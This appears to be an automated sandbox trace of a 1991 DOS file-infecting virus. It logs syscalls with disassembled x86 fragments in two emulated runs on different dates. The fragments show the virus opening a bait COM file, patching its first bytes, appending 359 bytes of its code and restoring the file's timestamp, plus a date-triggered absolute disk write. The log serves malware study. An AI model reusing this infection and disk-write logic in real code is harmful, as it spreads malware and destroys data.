{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3966,"SideJobID":0}
.
GIF
Syscalls:
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-25T11:50:33.849659263Z | 26 | PC: 12bba | Set disk transfer address |
| 2018-12-25T11:50:33.85121845Z | 71 | PC: 12aed | Get current directory |
| 2018-12-25T11:50:33.854824296Z | 78 | PC: 12afd | Find first file |
| 2018-12-25T11:50:33.86103321Z | 42 | PC: 12b12 | Get date 0x12b12: cmp al, 1 0x12b14: jne 0x12b2f 0x12b16: mov ah, 9 0x12b18: lea dx, word ptr [bp + 0x12c] 0x12b1c: int 0x21 0x12b1e: mov ah, 0x2c 0x12b20: int 0x21 0x12b22: mov al, 2 0x12b24: mov cx, 1 0x12b27: mov bx, word ptr ds:[bp + 0x12c] 0x12b2c: int 0x26 0x12b2e: pop dx 0x12b2f: mov ax, 0x3d02 0x12b32: lea dx, word ptr [bp + 0x28a] 0x12b36: int 0x21 0x12b38: xchg ax, bx 0x12b39: mov ah, 0x3f 0x12b3b: lea dx, word ptr [bp + 0x266] 0x12b3f: mov cx, 3 0x12b42: int 0x21 |
| 2018-12-25T11:50:33.863375215Z | 61 | PC: 12b38 | Open file (Filename = 'SLEEP.COM') |
| 2018-12-25T11:50:33.871003292Z | 63 | PC: 12b44 | Read file or device (Read 3 bytes on handle 5) |
| 2018-12-25T11:50:33.877147873Z | 66 | PC: 12bc2 | Move file pointer |
| 2018-12-25T11:50:33.878655098Z | 64 | PC: 12b76 | Write file or device (Write 3 bytes on handle 5) |
| 2018-12-25T11:50:33.88848068Z | 66 | PC: 12bc2 | Move file pointer (See above) |
| 2018-12-25T11:50:33.889745796Z | 44 | PC: 12b7f | Get time 0x12b7f: mov word ptr ds:[bp + 0x264], dx 0x12b84: push cx 0x12b85: push bx 0x12b86: push dx 0x12b87: call 0x22a64 0x12b8a: pop dx 0x12b8b: pop bx 0x12b8c: pop cx 0x12b8d: mov ah, 0x40 0x12b8f: mov cx, 0x167 0x12b92: lea dx, word ptr [bp + 0x103] 0x12b96: int 0x21 0x12b98: mov ax, 0x5701 0x12b9b: mov cx, word ptr ds:[bp + 0x282] 0x12ba0: mov dx, word ptr ds:[bp + 0x284] 0x12ba5: int 0x21 0x12ba7: mov ah, 0x3e 0x12ba9: int 0x21 0x12bab: mov ah, 0x3b 0x12bad: lea dx, word ptr [bp + 0x296] |
| 2018-12-25T11:50:33.891884198Z | 64 | PC: 12b98 | Write file or device (Write 359 bytes on handle 5) |
| 2018-12-25T11:50:34.725845399Z | 87 | PC: 12ba7 | Get or set file date and time |
| 2018-12-25T11:50:34.727628242Z | 62 | PC: 12bab | Close file |
| 2018-12-25T11:50:34.73545055Z | 59 | PC: 12bb3 | Change current directory |
| 2018-12-25T11:50:34.740691981Z | 26 | PC: 12bba | Set disk transfer address (See above) |
| 2018-12-25T11:50:34.742084187Z | 9 | PC: 12a47 | Display string (String= 'Dummy bait file - ignore') |
{"DateBased":true,"Day":7,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3966,"SideJobID":0}
.
GIF
Syscalls:
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-25T11:50:33.893400738Z | 26 | PC: 12bba | Set disk transfer address |
| 2018-12-25T11:50:33.895583976Z | 71 | PC: 12aed | Get current directory |
| 2018-12-25T11:50:33.898815074Z | 78 | PC: 12afd | Find first file |
| 2018-12-25T11:50:33.905538488Z | 42 | PC: 12b12 | Get date 0x12b12: cmp al, 1 0x12b14: jne 0x12b2f 0x12b16: mov ah, 9 0x12b18: lea dx, word ptr [bp + 0x12c] 0x12b1c: int 0x21 0x12b1e: mov ah, 0x2c 0x12b20: int 0x21 0x12b22: mov al, 2 0x12b24: mov cx, 1 0x12b27: mov bx, word ptr ds:[bp + 0x12c] 0x12b2c: int 0x26 0x12b2e: pop dx 0x12b2f: mov ax, 0x3d02 0x12b32: lea dx, word ptr [bp + 0x28a] 0x12b36: int 0x21 0x12b38: xchg ax, bx 0x12b39: mov ah, 0x3f 0x12b3b: lea dx, word ptr [bp + 0x266] 0x12b3f: mov cx, 3 0x12b42: int 0x21 |
| 2018-12-25T11:50:33.908075306Z | 9 | PC: 12b1e | Display string (String= '+ALLERBMU NORI+ (C) 1991 by SMAUG in M�NCHEN, DEUTSCHLAND!') |
| 2018-12-25T11:50:33.915611505Z | 44 | PC: 12b22 | Get time 0x12b22: mov al, 2 0x12b24: mov cx, 1 0x12b27: mov bx, word ptr ds:[bp + 0x12c] 0x12b2c: int 0x26 0x12b2e: pop dx 0x12b2f: mov ax, 0x3d02 0x12b32: lea dx, word ptr [bp + 0x28a] 0x12b36: int 0x21 0x12b38: xchg ax, bx 0x12b39: mov ah, 0x3f 0x12b3b: lea dx, word ptr [bp + 0x266] 0x12b3f: mov cx, 3 0x12b42: int 0x21 0x12b44: mov ax, word ptr ds:[bp + 0x286] 0x12b49: mov cx, word ptr ds:[bp + 0x267] 0x12b4e: add cx, 0x16a 0x12b52: cmp ax, cx 0x12b54: jne 0x12b5e 0x12b56: mov ah, 0x3e 0x12b58: int 0x21 |
| 2018-12-25T11:50:33.918485911Z | 61 | PC: 12b38 | Open file (Filename = 'SLEEP.COM') |
| 2018-12-25T11:50:33.925541812Z | 63 | PC: 12b44 | Read file or device (Read 3 bytes on handle 5) |
| 2018-12-25T11:50:33.941040295Z | 66 | PC: 12bc2 | Move file pointer |
| 2018-12-25T11:50:33.942631831Z | 64 | PC: 12b76 | Write file or device (Write 3 bytes on handle 5) |
| 2018-12-25T11:50:33.94564027Z | 66 | PC: 12bc2 | Move file pointer (See above) |
| 2018-12-25T11:50:33.947363959Z | 44 | PC: 12b7f | Get time 0x12b7f: mov word ptr ds:[bp + 0x264], dx 0x12b84: push cx 0x12b85: push bx 0x12b86: push dx 0x12b87: call 0x22a64 0x12b8a: pop dx 0x12b8b: pop bx 0x12b8c: pop cx 0x12b8d: mov ah, 0x40 0x12b8f: mov cx, 0x167 0x12b92: lea dx, word ptr [bp + 0x103] 0x12b96: int 0x21 0x12b98: mov ax, 0x5701 0x12b9b: mov cx, word ptr ds:[bp + 0x282] 0x12ba0: mov dx, word ptr ds:[bp + 0x284] 0x12ba5: int 0x21 0x12ba7: mov ah, 0x3e 0x12ba9: int 0x21 0x12bab: mov ah, 0x3b 0x12bad: lea dx, word ptr [bp + 0x296] |
| 2018-12-25T11:50:33.949387417Z | 64 | PC: 12b98 | Write file or device (Write 359 bytes on handle 5) |
| 2018-12-25T11:50:33.960131121Z | 87 | PC: 12ba7 | Get or set file date and time |
| 2018-12-25T11:50:33.962974102Z | 62 | PC: 12bab | Close file |
| 2018-12-25T11:50:33.971395334Z | 59 | PC: 12bb3 | Change current directory |
| 2018-12-25T11:50:33.975566879Z | 26 | PC: 12bba | Set disk transfer address (See above) |
| 2018-12-25T11:50:33.977051051Z | 9 | PC: 12a47 | Display string (String= 'Dummy bait file - ignore') |